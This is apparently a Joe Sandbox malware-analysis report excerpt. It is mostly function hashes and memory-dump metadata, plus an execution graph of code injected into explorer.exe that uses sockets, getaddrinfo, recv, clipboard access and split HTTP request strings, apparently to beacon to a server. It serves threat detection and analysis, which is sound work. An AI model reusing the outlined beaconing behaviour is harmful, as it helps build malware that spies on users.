                                                            • API String ID:
                                                            • Opcode ID: dd5cc551b25faa3c504f4e063594da92046f066f839804d29fa7f27eb6b819bf
                                                            • Instruction ID: fc1adcfa7173c1a240be350bd47f53873d31af1834b1481d2ab55bcc3c1aa000
                                                            • Opcode Fuzzy Hash: dd5cc551b25faa3c504f4e063594da92046f066f839804d29fa7f27eb6b819bf
                                                            • Instruction Fuzzy Hash: F490027530100802D24461694844686000597D0341F51C021A6014695E96A58891B171
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A39520 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2a6a249fbd7035bdeb2ad8ce87bdc2cee82f229bf18a3b174cfca6439f49b540
                                                            • Instruction ID: a460ede559557fdc4233c232f432dfdbddec85d9f0ef50ea82a86f4dbe1db7bd
                                                            • Opcode Fuzzy Hash: 2a6a249fbd7035bdeb2ad8ce87bdc2cee82f229bf18a3b174cfca6439f49b540
                                                            • Instruction Fuzzy Hash: 3C9002E5301140924640A2698444B0A450597E0341B51C026E10445A0CC5658851E175
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A3AD30 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f3669433d1a87a3503b2937fb735787f479cdd3172092d33fa53877b69c2032f
                                                            • Instruction ID: a97aeefbf91e4c9ebb952dec13acd1b8966c4f45d095d645ea3b29a1e546a3f4
                                                            • Opcode Fuzzy Hash: f3669433d1a87a3503b2937fb735787f479cdd3172092d33fa53877b69c2032f
                                                            • Instruction Fuzzy Hash: 3F900275B05000129280716948546464006A7E0781B55C021A0504594C89948A55A3E1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A39560 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7dd3a5078095f35eca92646a1fdf0abd75a8cabf5e36c255866c0906cad740e6
                                                            • Instruction ID: 70ae5955d2cd9b994136cc6a6bd663c9aa8c04859bdd1f6641be4a8f9d74a27b
                                                            • Opcode Fuzzy Hash: 7dd3a5078095f35eca92646a1fdf0abd75a8cabf5e36c255866c0906cad740e6
                                                            • Instruction Fuzzy Hash: 09900269321000020285A569064450B0445A7D6391391C025F14065D0CC6618865A361
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A396D0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 198198536b54020ff739ff1daa9fcd9929c8497be6f1fd6d1ee386e7c08112b6
                                                            • Instruction ID: a31c20466f91fb8518deab1cb752f62fb5c8d2c00e1d6db3e8ff926cb7949f39
                                                            • Opcode Fuzzy Hash: 198198536b54020ff739ff1daa9fcd9929c8497be6f1fd6d1ee386e7c08112b6
                                                            • Instruction Fuzzy Hash: 0F90027530100842D24061694444B46000597E0341F51C026A0114694D8655C851B561
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A39610 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a3e1db4b53dd2f4e74e86572f1d1ade85f2326ff2a191581d0b4d2e21230796d
                                                            • Instruction ID: 92d0c3dddb4c53bbd0af951cf382337a264bd46eae015d3e6e328d050631ef92
                                                            • Opcode Fuzzy Hash: a3e1db4b53dd2f4e74e86572f1d1ade85f2326ff2a191581d0b4d2e21230796d
                                                            • Instruction Fuzzy Hash: 0790027570500802D29071694454746000597D0341F51C021A0014694D87958A55B6E1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A39650 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fc9eefd739988cb5f169d9659d7b0e2086d2364558d178cccedb075d2f3945d8
                                                            • Instruction ID: 26e816479b1a769226a71fa182ed1fd18f2d7cc97382a72027869105ccc7e8f1
                                                            • Opcode Fuzzy Hash: fc9eefd739988cb5f169d9659d7b0e2086d2364558d178cccedb075d2f3945d8
                                                            • Instruction Fuzzy Hash: F890027530504842D28071694444A46001597D0345F51C021A00546D4D96658D55F6A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A39730 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cbc0cb789e19b5669a721bc8a0d666771a1054fa8ed888f542a2b11fef75bdb8
                                                            • Instruction ID: d88346592c2bc2e5d63076665f7ab5c2b04697c3a2c5c8728d13d5d0978a2df9
                                                            • Opcode Fuzzy Hash: cbc0cb789e19b5669a721bc8a0d666771a1054fa8ed888f542a2b11fef75bdb8
                                                            • Instruction Fuzzy Hash: 1C90026570500402D28071695458706001597D0341F51D021A0014594DC6998A55B6E1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A3A710 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2d6b2b350ceb8f801df1d4011f044b4c8841c87c3ce0994c5d28d6764b05ee45
                                                            • Instruction ID: 4f3fba1f12d5b86a6adc09748472f13091af939f9f9724531ac59252c27a24a8
                                                            • Opcode Fuzzy Hash: 2d6b2b350ceb8f801df1d4011f044b4c8841c87c3ce0994c5d28d6764b05ee45
                                                            • Instruction Fuzzy Hash: 46900275301000529640A6A95844A4A410597F0341B51D025A4004594C85948861A161
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A39760 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 493f17ed834d3242bf4c45c1971c0e93bd78298ae30ebba686f700274f637621
                                                            • Instruction ID: 32a58c8393d4bf14a90242acfa771660a006991203439bbed160fa034e729507
                                                            • Opcode Fuzzy Hash: 493f17ed834d3242bf4c45c1971c0e93bd78298ae30ebba686f700274f637621
                                                            • Instruction Fuzzy Hash: 9390027530100403D24061695548707000597D0341F51D421A0414598DD6968851B161
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A39770 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d8f3cbc885204d218efa5d19087c3b6f5be40dfd3ad1846483e64e07ee84dc36
                                                            • Instruction ID: 4365318bbcec634f908b7ee491300083e6cb3d4e5336b5ec80b0b8fce1e2c39f
                                                            • Opcode Fuzzy Hash: d8f3cbc885204d218efa5d19087c3b6f5be40dfd3ad1846483e64e07ee84dc36
                                                            • Instruction Fuzzy Hash: 0490047530504443D340757D544CF070005D7D0345F51D031F10545D5DC775CC51F171
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A3A770 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d0db6a3fe53ef69997f0ad1dc32989f00e1b1d0bb1b9c004e022ebed83aec28d
                                                            • Instruction ID: 0462f377e9076efbc1469e49279942be19fc086e479e1333778e28e1099be3b8
                                                            • Opcode Fuzzy Hash: d0db6a3fe53ef69997f0ad1dc32989f00e1b1d0bb1b9c004e022ebed83aec28d
                                                            • Instruction Fuzzy Hash: 8690027930504442D64065695844A87000597D0345F51D421A04145DCD86948861F161
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A39670 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                            • Instruction ID: 6f809e5f8a2415898a93a880bdf8bf5f36c4babdb3f16e144d061bc7f7a6759b
                                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                            • Instruction Fuzzy Hash:
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A8FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 53%
                                                            			E00A8FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00A3CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00A85720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00A85720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                            0x00a8fdda
                                                            0x00a8fde2
                                                            0x00a8fde5
                                                            0x00a8fdec
                                                            0x00a8fdfa
                                                            0x00a8fdff
                                                            0x00a8fe0a
                                                            0x00a8fe0f
                                                            0x00a8fe17
                                                            0x00a8fe1e
                                                            0x00a8fe19
                                                            0x00a8fe19
                                                            0x00a8fe19
                                                            0x00a8fe20
                                                            0x00a8fe21
                                                            0x00a8fe22
                                                            0x00a8fe25
                                                            0x00a8fe40

                                                            APIs
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A8FDFA
                                                            Strings
                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00A8FE2B
                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00A8FE01
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                            • API String ID: 885266447-3903918235
                                                            • Opcode ID: d9ba31fddcc686f249622c3180501812b81d4d66558515592a7e10b1b9890266
                                                            • Instruction ID: 3abf52243d4c6e49ce00e09f1b107d0deed4032f8231c4589ff249e88806b6eb
                                                            • Opcode Fuzzy Hash: d9ba31fddcc686f249622c3180501812b81d4d66558515592a7e10b1b9890266
                                                            • Instruction Fuzzy Hash: EAF0F632600641BFDA212B56DD02F23BB6AEB84730F244315F668565E1DA62FC6097F0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Execution Graph

                                                            Execution Coverage:6.1%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:13.8%
                                                            Total number of Nodes:94
                                                            Total number of Limit Nodes:10
                                                            execution_graph 7523 b732592 7527 b7325b3 7523->7527 7524 b732678 7525 b7325e2 SleepEx 7525->7525 7525->7527 7527->7524 7527->7525 7530 b733e12 7527->7530 7534 b7394a2 7527->7534 7539 b7323f2 7527->7539 7531 b733e2b 7530->7531 7533 b733e6f 7530->7533 7532 b733e67 OpenClipboard 7531->7532 7531->7533 7532->7533 7533->7527 7536 b7394d9 7534->7536 7535 b739568 7535->7527 7535->7535 7536->7535 7538 b739551 SleepEx 7536->7538 7543 b73a4e2 7536->7543 7538->7536 7540 b7324a9 7539->7540 7541 b73240b 7539->7541 7540->7527 7542 b73a4e2 8 API calls 7541->7542 7542->7540 7544 b73a515 7543->7544 7547 b73a5df 7544->7547 7553 b73ab47 7544->7553 7559 b736ed2 7544->7559 7546 b73a6a6 7546->7553 7558 b73a72e 7546->7558 7562 b737072 7546->7562 7547->7546 7549 b73a67c getaddrinfo 7547->7549 7547->7553 7549->7546 7551 b73ad0b 7552 b73ad2c SleepEx 7551->7552 7554 b73ad38 7551->7554 7552->7553 7553->7536 7554->7553 7555 b73adbd setsockopt recv 7554->7555 7555->7553 7556 b73ae1a 7555->7556 7556->7553 7557 b73ae23 recv 7556->7557 7557->7553 7557->7556 7558->7553 7565 b736fe2 7558->7565 7560 b736f34 socket 7559->7560 7561 b736f0c 7559->7561 7560->7547 7561->7560 7563 b7370d2 connect 7562->7563 7564 b7370aa 7562->7564 7563->7558 7564->7563 7566 b737017 7565->7566 7567 b73703f send 7565->7567 7566->7567 7567->7551 7568 b732692 7569 b7326a9 7568->7569 7570 b7326f9 7569->7570 7571 b7326d3 CreateThread 7569->7571 7572 b7342c1 7573 b7342e4 7572->7573 7580 b735fa2 7573->7580 7576 b7323f2 8 API calls 7578 b7342f4 7576->7578 7577 b734370 7578->7577 7586 b7324e2 7578->7586 7581 b735fe7 7580->7581 7594 b735e52 7581->7594 7583 b73612f 7598 b736f62 7583->7598 7585 b7342ec 7585->7576 7587 b732587 7586->7587 7588 b7324ff 7586->7588 7587->7578 7588->7587 7589 b733e12 OpenClipboard 7588->7589 7590 b732577 7589->7590 7591 b7394a2 9 API calls 7590->7591 7592 b73257f 7591->7592 7593 b7323f2 8 API calls 7592->7593 7593->7587 7595 b735e7e 7594->7595 7601 b735462 7595->7601 7597 b735e8b 7597->7583 7599 b736fc5 WSAStartup 7598->7599 7600 b736f9d 7598->7600 7599->7585 7600->7599 7602 b7354d4 7601->7602 7603 b73554f 7602->7603 7604 b73553e ObtainUserAgentString 7602->7604 7603->7597 7604->7603 7605 b736f57 7606 b736f5b WSAStartup 7605->7606 7615 b7324d5 7618 b7324e3 7615->7618 7616 b732587 7617 b733e12 OpenClipboard 7619 b732577 7617->7619 7618->7616 7618->7617 7620 b7394a2 9 API calls 7619->7620 7621 b73257f 7620->7621 7622 b7323f2 8 API calls 7621->7622 7622->7616 7608 b7323e9 7610 b7323f3 7608->7610 7609 b7324a9 7610->7609 7611 b73a4e2 8 API calls 7610->7611 7611->7609 7612 b737068 7613 b7370d2 connect 7612->7613 7614 b7370aa 7612->7614 7614->7613 7623 b736ecc 7624 b736f34 socket 7623->7624 7625 b736f0c 7623->7625 7625->7624 7626 b73949c 7627 b7394d9 7626->7627 7628 b739568 7627->7628 7629 b73a4e2 8 API calls 7627->7629 7630 b739551 SleepEx 7627->7630 7629->7627 7630->7627

                                                            Executed Functions

                                                            Function 0B73A4E2 Relevance: 27.1, APIs: 5, Strings: 10, Instructions: 829networkCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 b73a4e2-b73a513 1 b73a533-b73a536 0->1 2 b73a515-b73a519 0->2 4 b73aba5-b73abb2 1->4 5 b73a53c-b73a542 1->5 2->1 3 b73a51b-b73a51f 2->3 3->1 6 b73a521-b73a525 3->6 5->4 7 b73a548-b73a55c 5->7 6->1 8 b73a527-b73a52b 6->8 9 b73a564-b73a565 7->9 10 b73a55e-b73a562 7->10 8->1 11 b73a52d-b73a531 8->11 12 b73a56f-b73a578 9->12 10->9 10->12 11->1 11->5 13 b73a57a-b73a57e 12->13 14 b73a58f-b73a593 12->14 15 b73a580-b73a58d 13->15 16 b73a59b-b73a5be 13->16 14->16 17 b73a595 14->17 15->17 18 b73a5c0-b73a5c4 16->18 19 b73a5c6-b73a5da call b736ed2 16->19 17->16 18->19 20 b73a602-b73a609 18->20 22 b73a5df-b73a5fc 19->22 23 b73a6b9-b73a6c9 20->23 24 b73a60f-b73a617 20->24 22->20 25 b73ab95-b73ab9e 22->25 23->25 26 b73a6cf-b73a6df 23->26 27 b73a647-b73a65a 24->27 28 b73a619-b73a641 call b732012 call b739ea2 24->28 25->4 30 b73a6e1-b73a6f2 call b736e62 26->30 31 b73a6f9-b73a70b 26->31 27->25 29 b73a660-b73a666 27->29 28->27 29->25 33 b73a66c-b73a66e 29->33 30->31 35 b73a76e-b73a793 31->35 36 b73a70d-b73a729 call b737072 31->36 33->25 40 b73a674-b73a676 33->40 38 b73a7b2-b73a7b6 35->38 39 b73a795-b73a7b0 call b73b302 35->39 48 b73a72e-b73a756 36->48 46 b73ab85-b73ab86 38->46 47 b73a7bc-b73a7c0 38->47 55 b73a7fa call b73b302 39->55 40->25 45 b73a67c-b73a6a4 getaddrinfo 40->45 45->23 51 b73a6a6-b73a6ae 45->51 53 b73ab8d-b73ab8e 46->53 47->46 52 b73a7c6-b73a7ca 47->52 48->35 54 b73a758-b73a764 48->54 51->23 56 b73a7d2-b73a7f8 call b73b302 52->56 57 b73a7cc-b73a7d0 52->57 53->25 54->53 58 b73a76a 54->58 59 b73a7ff-b73a8af call b73b2d2 call b738392 call b738382 * 2 call b73b2d2 call b7377c2 call b73b4f2 55->59 56->55 57->56 57->59 58->35 77 b73a8c3-b73a923 call b73b302 59->77 78 b73a8b1-b73a8b5 59->78 83 b73aa10-b73aafd call b73b2d2 call b73b782 * 4 call b73b4f2 * 2 call b738382 * 2 77->83 84 b73a929-b73a965 call b73b2d2 call b73b782 call b73b4f2 77->84 78->77 80 b73a8b7-b73a8be call b737cc2 78->80 80->77 116 b73ab02-b73ab26 call b73b782 83->116 98 b73a987-b73a9b5 call b73b782 * 2 84->98 99 b73a967-b73a983 call b73b782 call b73b4f2 84->99 112 b73a9b7-b73a9d9 call b73b4f2 call b73b782 98->112 113 b73a9de-b73a9e2 98->113 99->98 112->113 113->116 117 b73a9e8-b73aa0b call b73b782 113->117 126 b73abb3-b73ac8f call b73b782 * 7 call b73b4f2 call b73b2d2 call b73b4f2 call b7377c2 call b737cc2 116->126 127 b73ab2c-b73ab41 call b73b782 call b73b4f2 116->127 117->116 141 b73ab47-b73ab81 call b736d02 call b737102 126->141 188 b73ac95-b73ac9c 126->188 127->141 142 b73ace4-b73ad0d call b736fe2 127->142 141->46 149 b73ad38-b73ad3c 142->149 150 b73ad0f-b73ad24 142->150 154 b73ad50-b73ad64 149->154 155 b73ad3e-b73ad42 149->155 150->149 153 b73ad26-b73ad2a 150->153 153->149 158 b73ad2c-b73ad33 SleepEx 153->158 161 b73ad82-b73ae18 call b73b302 call b73b2d2 setsockopt recv 154->161 162 b73ad66-b73ad7c 154->162 159 b73ad48-b73ad4a 155->159 160 b73ae6f-b73aea5 call b737102 155->160 158->160 159->154 159->160 160->46 174 b73ae1a 161->174 175 b73ae58-b73ae65 161->175 162->160 162->161 174->175 178 b73ae1c-b73ae21 174->178 175->160 178->175 180 b73ae23-b73ae56 recv 178->180 180->174 180->175 189 b73acc6-b73acd1 188->189 190 b73ac9e-b73aca5 188->190 189->142 193 b73acd3-b73acde 189->193 191 b73aca7-b73acb3 190->191 192 b73acbd-b73acc4 190->192 191->192 192->189 194 b73ace0-b73ace1 192->194 193->142 194->142
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.513596661.000000000B700000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B700000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_b700000_explorer.jbxd
                                                            Similarity
                                                            • API ID: recv$Sleepgetaddrinfosetsockopt
                                                            • String ID: Co$&br=$&un=$&wn=$: cl$GET $dat=$nnec$ose$tion
                                                            • API String ID: 878647675-2045366144
                                                            • Opcode ID: 919ada85d6d5f5293ae2865f33b49d2841302952dd8815af8d0eab5be181b76c
                                                            • Instruction ID: 2328d3d755f3c0b51e66ec47bef4d1cda535fefc7f71eb37c6eff5b9dd79fb73
                                                            • Opcode Fuzzy Hash: 919ada85d6d5f5293ae2865f33b49d2841302952dd8815af8d0eab5be181b76c
                                                            • Instruction Fuzzy Hash: 87529330618B088FCB29EF28D485AEEB3E1FB98704F54562DE49BC7246DF34A546CB41
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0B735462 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 104COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • ObtainUserAgentString.URLMON ref: 0B735549
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.513596661.000000000B700000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B700000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_b700000_explorer.jbxd
                                                            Similarity
                                                            • API ID: AgentObtainStringUser
                                                            • String ID: -Age$User$nt: $on.d$urlm
                                                            • API String ID: 2681117516-1987325725
                                                            • Opcode ID: 8e6d898b0d8aa8bf5b1cfee9b365fe9ba51cf3aa0ae9aac90c25f02f1de6fda5
                                                            • Instruction ID: f872188a3c7811bdbe293c87fc6ea08af5bac1698478d189e7ea8319ddcd2a8b
                                                            • Opcode Fuzzy Hash: 8e6d898b0d8aa8bf5b1cfee9b365fe9ba51cf3aa0ae9aac90c25f02f1de6fda5
                                                            • Instruction Fuzzy Hash: 9C31F131B14A4C8FCF44EFA8C8893EDB7E1FB58605F40422AE44EE7341EE7896498785
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0B737072 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53networkCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 215 b737072-b7370a8 216 b7370d2-b7370f5 connect 215->216 217 b7370aa-b7370cc call b739ea2 215->217 217->216
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.513596661.000000000B700000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B700000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_b700000_explorer.jbxd
                                                            Similarity
                                                            • API ID: connect
                                                            • String ID: conn$ect
                                                            • API String ID: 1959786783-716201944
                                                            • Opcode ID: 6189d17d8dbe04def35b6012d8970ad4f9ded0b5ef87b2fbebac81449d1e1971
                                                            • Instruction ID: 4e71a3094bf666a58fdc381d55958ba51bdae38b525c730cb999ecac30412661
                                                            • Opcode Fuzzy Hash: 6189d17d8dbe04def35b6012d8970ad4f9ded0b5ef87b2fbebac81449d1e1971
                                                            • Instruction Fuzzy Hash: 78012171618A0C8FCB94EF5CD488B557BE0FB58311F1541BEA90DCB266C7B5D8418BD1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0B737068 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 220 b737068-b7370a8 221 b7370d2-b7370f5 connect 220->221 222 b7370aa-b7370cc call b739ea2 220->222 222->221
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.513596661.000000000B700000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B700000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_b700000_explorer.jbxd
                                                            Similarity
                                                            • API ID: connect
                                                            • String ID: conn$ect
                                                            • API String ID: 1959786783-716201944
                                                            • Opcode ID: 6aed732840be068cdf0d11279b8e545c2ad14dcf7d4c16d91ac6593d107574df
                                                            • Instruction ID: 380ed472be468469e1e84ce417f79e913211a38a451e65373a2ee67095766fbc
                                                            • Opcode Fuzzy Hash: 6aed732840be068cdf0d11279b8e545c2ad14dcf7d4c16d91ac6593d107574df
                                                            • Instruction Fuzzy Hash: 0101F53151C6484FCB54EF5CD488B99BBE1FB98310F1941BEE90ECB226C7B19C458B81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0B736F62 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45networkCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 225 b736f62-b736f9b 226 b736fc5-b736fe0 WSAStartup 225->226 227 b736f9d-b736fbf call b739ea2 225->227 227->226
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.513596661.000000000B700000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B700000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_b700000_explorer.jbxd
                                                            Similarity
                                                            • API ID: Startup
                                                            • String ID: WSAS$tart
                                                            • API String ID: 724789610-2426239465
                                                            • Opcode ID: a7da792f1a933349aea2e71cb15f295d13c35a45004f7f7f238a3103e74baf4a
                                                            • Instruction ID: 5913484c0d47607e7fe3d91f8ca29fae542ed40eaed7ad3d388112695c154703
                                                            • Opcode Fuzzy Hash: a7da792f1a933349aea2e71cb15f295d13c35a45004f7f7f238a3103e74baf4a
                                                            • Instruction Fuzzy Hash: CF014F30508A088FDB84DF5DD08C769B7E0FB58311F2441AAE40DCB365C7B5D985C796
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0B732592 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 84COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
